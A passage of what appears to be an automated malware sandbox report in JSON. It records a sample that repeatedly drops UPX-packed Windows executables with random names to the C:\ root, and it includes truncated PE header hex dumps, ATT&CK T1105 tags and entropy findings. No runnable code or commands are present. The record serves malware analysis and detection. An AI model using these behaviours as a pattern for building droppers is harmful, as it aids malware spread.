4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"28848.exe\" wrote 15029 bytes starting with PE header signature to file \"C:\\8240402.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"8240402.exe\" wrote 15043 bytes starting with PE header signature to file \"C:\\802848.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"802848.exe\" wrote 15056 bytes starting with PE header signature to file \"C:\\4404864.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"4404864.exe\" wrote 15075 bytes starting with PE header signature to file \"C:\\dbhbvhd.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"dbhbvhd.exe\" wrote 15085 bytes starting with PE header signature to file \"C:\\xfllptv.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"xfllptv.exe\" wrote 15098 bytes starting with PE header signature to file \"C:\\pppjrfj.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"pppjrfj.exe\" wrote 15109 bytes starting with PE header signature to file \"C:\\tjtvdt.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"tjtvdt.exe\" wrote 15119 bytes starting with PE header signature to file \"C:\\428848.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"428848.exe\" wrote 15139 bytes starting with PE header signature to file \"C:\\dtdld.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"dtdld.exe\" wrote 15154 bytes starting with PE header signature to file \"C:\\bpxbh.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"bpxbh.exe\" wrote 15166 bytes starting with PE header signature to file \"C:\\tjjhnh.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"tjjhnh.exe\" wrote 15180 bytes starting with PE header signature to file \"C:\\brpvfll.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"brpvfll.exe\" wrote 15196 bytes starting with PE header signature to file \"C:\\240248.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"240248.exe\" wrote 15213 bytes starting with PE header signature to file \"C:\\20468.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"20468.exe\" wrote 15223 bytes starting with PE header signature to file \"C:\\206828.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"206828.exe\" wrote 15238 bytes starting with PE header signature to file \"C:\\xldxxbf.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"xldxxbf.exe\" wrote 15249 bytes starting with PE header signature to file \"C:\\jjjhv.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"jjjhv.exe\" wrote 15264 bytes starting with PE header signature to file \"C:\\jfnlx.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"jfnlx.exe\" wrote 15276 bytes starting with PE header signature to file \"C:\\nbvdjp.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"nbvdjp.exe\" wrote 15292 bytes starting with PE header signature to file \"C:\\rdrhhx.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"rdrhhx.exe\" wrote 15303 bytes starting with PE header signature to file \"C:\\lxxvtvn.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"lxxvtvn.exe\" wrote 15318 bytes starting with PE header signature to file \"C:\\dtndd.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"dtndd.exe\" wrote 15330 bytes starting with PE header signature to file \"C:\\rdjtrt.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"rdjtrt.exe\" wrote 15348 bytes starting with PE header signature to file \"C:\\ntxjntx.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"ntxjntx.exe\" wrote 15361 bytes starting with PE header signature to file \"C:\\bdxfltt.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"bdxfltt.exe\" wrote 15381 bytes starting with PE header signature to file \"C:\\dvftv.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"dvftv.exe\" wrote 15398 bytes starting with PE header signature to file \"C:\\djhpdbh.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"djhpdbh.exe\" wrote 15415 bytes starting with PE header signature to file \"C:\\tbxtf.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"tbxtf.exe\" wrote 15431 bytes starting with PE header signature to file \"C:\\vxjvbn.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"vxjvbn.exe\" wrote 15445 bytes starting with PE header signature to file \"C:\\pnxhn.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"pnxhn.exe\" wrote 15463 bytes starting with PE header signature to file \"C:\\4202648.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"4202648.exe\" wrote 15476 bytes starting with PE header signature to file \"C:\\rhxdb.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"rhxdb.exe\" wrote 15496 bytes starting with PE header signature to file \"C:\\262684.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"262684.exe\" wrote 15516 bytes starting with PE header signature to file \"C:\\662068.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"662068.exe\" wrote 15531 bytes starting with PE header signature to file \"C:\\26684.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"26684.exe\" wrote 15549 bytes starting with PE header signature to file \"C:\\426882.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"426882.exe\" wrote 15562 bytes starting with PE header signature to file \"C:\\2404242.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"2404242.exe\" wrote 15576 bytes starting with PE header signature to file \"C:\\0002860.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"0002860.exe\" wrote 15587 bytes starting with PE header signature to file \"C:\\82086.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"82086.exe\" wrote 15606 bytes starting with PE header signature to file \"C:\\068668.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"068668.exe\" wrote 15623 bytes starting with PE header signature to file \"C:\\224404.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"224404.exe\" wrote 15642 bytes starting with PE header signature to file \"C:\\dpdrtr.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"dpdrtr.exe\" wrote 15654 bytes starting with PE header signature to file \"C:\\rrhrlx.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"rrhrlx.exe\" wrote 15664 bytes starting with PE header signature to file \"C:\\rpnxll.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"rpnxll.exe\" wrote 15678 bytes starting with PE header signature to file \"C:\\vlhdl.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"vlhdl.exe\" wrote 15693 bytes starting with PE header signature to file \"C:\\0406488.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"0406488.exe\" wrote 15704 bytes starting with PE header signature to file \"C:\\848084.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"848084.exe\" wrote 15721 bytes starting with PE header signature to file \"C:\\802262.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"802262.exe\" wrote 15739 bytes starting with PE header signature to file \"C:\\048424.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"048424.exe\" wrote 15752 bytes starting with PE header signature to file \"C:\\4042804.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"pltvbn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"npdthpv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"dhtjtp.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"nfrbnh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"00068.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"840262.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"4880662.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"28028.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"040202.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"rtbxtx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"0228228.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"080844.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"046220.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"86682.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"4042804.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\4042804.exe]- [targetUID: 00000000-00002840]\n \"048424.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\048424.exe]- [targetUID: 00000000-00001604]\n \"802262.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\802262.exe]- [targetUID: 00000000-00000784]\n \"848084.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\848084.exe]- [targetUID: 00000000-00000784]\n \"0406488.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\0406488.exe]- [targetUID: 00000000-00002312]\n \"vlhdl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\vlhdl.exe]- [targetUID: 00000000-00003304]\n \"rpnxll.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rpnxll.exe]- [targetUID: 00000000-00001116]\n \"rrhrlx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rrhrlx.exe]- [targetUID: 00000000-00001116]\n \"dpdrtr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\dpdrtr.exe]- [targetUID: 00000000-00001512]\n \"224404.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\224404.exe]- [targetUID: 00000000-00001512]\n \"068668.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\068668.exe]- [targetUID: 00000000-00000416]\n \"82086.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\82086.exe]- [targetUID: 00000000-00003220]\n \"0002860.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\0002860.exe]- [targetUID: 00000000-00001468]\n \"2404242.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\2404242.exe]- [targetUID: 00000000-00001468]\n \"426882.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\426882.exe]- [targetUID: 00000000-00001472]\n \"26684.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\26684.exe]- [targetUID: 00000000-00001472]\n \"662068.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\662068.exe]- [targetUID: 00000000-00001292]\n \"262684.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\262684.exe]- [targetUID: 00000000-00004020]\n \"rhxdb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rhxdb.exe]- [targetUID: 00000000-00003700]\n \"4202648.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\4202648.exe]- [targetUID: 00000000-00003844]\n \"pnxhn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\pnxhn.exe]- [targetUID: 00000000-00003844]\n \"vxjvbn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\vxjvbn.exe]- [targetUID: 00000000-00001228]\n \"tbxtf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\tbxtf.exe]- [targetUID: 00000000-00001228]\n \"djhpdbh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\djhpdbh.exe]- [targetUID: 00000000-00001208]\n \"dvftv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\dvftv.exe]- [targetUID: 00000000-00001208]\n \"bdxfltt.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\bdxfltt.exe]- [targetUID: 00000000-00003264]\n \"ntxjntx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\ntxjntx.exe]- [targetUID: 00000000-00004544]\n \"rdjtrt.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rdjtrt.exe]- [targetUID: 00000000-00004224]\n \"dtndd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\dtndd.exe]- [targetUID: 00000000-00001796]\n \"lxxvtvn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\lxxvtvn.exe]- [targetUID: 00000000-00001796]\n \"rdrhhx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rdrhhx.exe]- [targetUID: 00000000-00004364]\n \"nbvdjp.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\nbvdjp.exe]- [targetUID: 00000000-00001844]\n \"jfnlx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\jfnlx.exe]- [targetUID: 00000000-00001844]\n \"jjjhv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\jjjhv.exe]- [targetUID: 00000000-00004048]\n \"xldxxbf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\xldxxbf.exe]- [targetUID: 00000000-00002776]\n \"206828.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\206828.exe]- [targetUID: 00000000-00003656]\n \"20468.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\20468.exe]- [targetUID: 00000000-00003656]\n \"240248.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\240248.exe]- [targetUID: 00000000-00003864]\n \"brpvfll.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\brpvfll.exe]- [targetUID: 00000000-00004492]\n \"tjjhnh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\tjjhnh.exe]- [targetUID: 00000000-00004492]\n \"bpxbh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\bpxbh.exe]- [targetUID: 00000000-00004568]\n \"dtdld.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\dtdld.exe]- [targetUID: 00000000-00004568]\n \"428848.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\428848.exe]- [targetUID: 00000000-00002700]\n \"tjtvdt.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\tjtvdt.exe]- [targetUID: 00000000-00002700]\n \"pppjrfj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\pppjrfj.exe]- [targetUID: 00000000-00003276]\n \"xfllptv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\xfllptv.exe]- [targetUID: 00000000-00004092]\n \"dbhbvhd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\dbhbvhd.exe]- [targetUID: 00000000-00003628]\n \"4404864.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\4404864.exe]- [targetUID: 00000000-00003628]\n \"802848.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\802848.exe]- [targetUID: 00000000-00003564]\n \"8240402.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\8240402.exe]- [targetUID: 00000000-00000692]\n \"28848.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\28848.exe]- [targetUID: 00000000-00004488]\n \"08446.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\08446.exe]- [targetUID: 00000000-00004168]\n \"80004.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\80004.exe]- [targetUID: 00000000-00003968]\n \"648042.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\648042.exe]- [targetUID: 00000000-00003968]\n \"fhhxhtt.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\fhhxhtt.exe]- [targetUID: 00000000-00004460]\n \"xbxthhr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\xbxthhr.exe]- [targetUID: 00000000-00004236]\n \"48866.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\48866.exe]- [targetUID: 00000000-00006120]\n \"2288488.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\2288488.exe]- [targetUID: 00000000-00006120]\n \"60064.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\60064.exe]- [targetUID: 00000000-00004340]\n \"66840.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\66840.exe]- [targetUID: 00000000-00004296]\n \"njhfl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\njhfl.exe]- [targetUID: 00000000-00005896]\n \"00062.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\00062.exe]- [targetUID: 00000000-00005896]\n \"2428202.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\2428202.exe]- [targetUID: 00000000-00003744]\n \"24680.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\24680.exe]- [targetUID: 00000000-00003744]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa\" has section name UPX1 with entropy \"7.97244478673\"\n \"pltvbn.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"npdthpv.exe\" has section name UPX1 with entropy 